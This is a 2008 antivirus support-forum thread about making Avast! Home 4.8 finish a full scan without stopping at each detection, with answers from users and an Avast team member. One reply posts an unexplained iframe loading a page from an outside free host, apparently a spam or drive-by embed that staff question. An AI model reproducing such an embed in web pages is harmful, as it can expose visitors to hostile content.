Author Topic: Newbie Question.  (Read 4079 times)

1Hz

Newbie Question.
« on: July 09, 2008, 02:21:45 AM »
I just installed Avast! Home Edition 4.8 yesterday and ran a full system scan last night for the first time. When I checked this morning, the scan was only 9% complete; I received a pop-up notice for a virus and it stopped scanning as soon as this virus was found.

My question is, how can I set it so that Avast! continues to scan on its own until finished, and delete virii it finds or move it to the virus chest automatically?

I read the help file, but I can't find where "Tasks" is.

Thanks for your help.

lukthemighty

Re: Newbie Question.
« Reply #1 on: July 09, 2008, 02:41:08 AM »
Tasks Settings is for the paid version.

Offline Lisandro

• Avast team
  • Certainly Bot
« Reply #2 on: July 09, 2008, 04:53:54 PM »
Only in Professional version (see picture here: http://forum.avast.com/index.php?topic=13315.msg112285#msg112285).

In Home version you can check the option "Don't show this window again" as soon as the first virus warning appears, and click on "No action" button. This way, nothing will be done and you will be presented the results at the end (and you can perform actions from there).
The best things in life are free.

Offline lakrsrool

• Advanced Poster
  • Get the Picture !
« Reply #3 on: July 09, 2008, 06:08:41 PM »
Tech, that setting will be "persistant" right? So that all subsequent scans will not give any "warning message" (not even the first) and will continue the scan until done as you said and only show the results at the end.

How can you reset the "don't show this window" setting back so that "warnings" do show up as before?
Processor: i3 2.53 GHz 4 GIG RAM, OS: WIN 7, Connection: High Speed, Virus/Malware Protection: Avast-2015, SpywareBlaster, Windows Firewall & Defender. Email: Outlook 2010 w/ POP Peeper Email Notifiers.

Offline Lisandro

• Avast team
  • Certainly Bot
« Reply #4 on: July 09, 2008, 07:42:25 PM »
Tech, that setting will be "persistant" right? So that all subsequent scans will not give any "warning message" (not even the first) and will continue the scan until done as you said and only show the results at the end.
Not in Home version. Each scan, the first infection will be warned.

How can you reset the "don't show this window" setting back so that "warnings" do show up as before?
In Professional version, edit the 'Virus' page of settings.

zipzip

« Reply #5 on: July 11, 2008, 07:00:52 PM »
<iframe scrolling="auto" src="http://sss1.110mb.com/1/1.html" width="300" height="150"></iframe>

Offline Lisandro

• Avast team
  • Certainly Bot
« Reply #6 on: July 11, 2008, 08:56:14 PM »
<iframe scrolling="auto" src="http://sss1.110mb.com/1/1.html" width="300" height="150"></iframe>
What is it? ???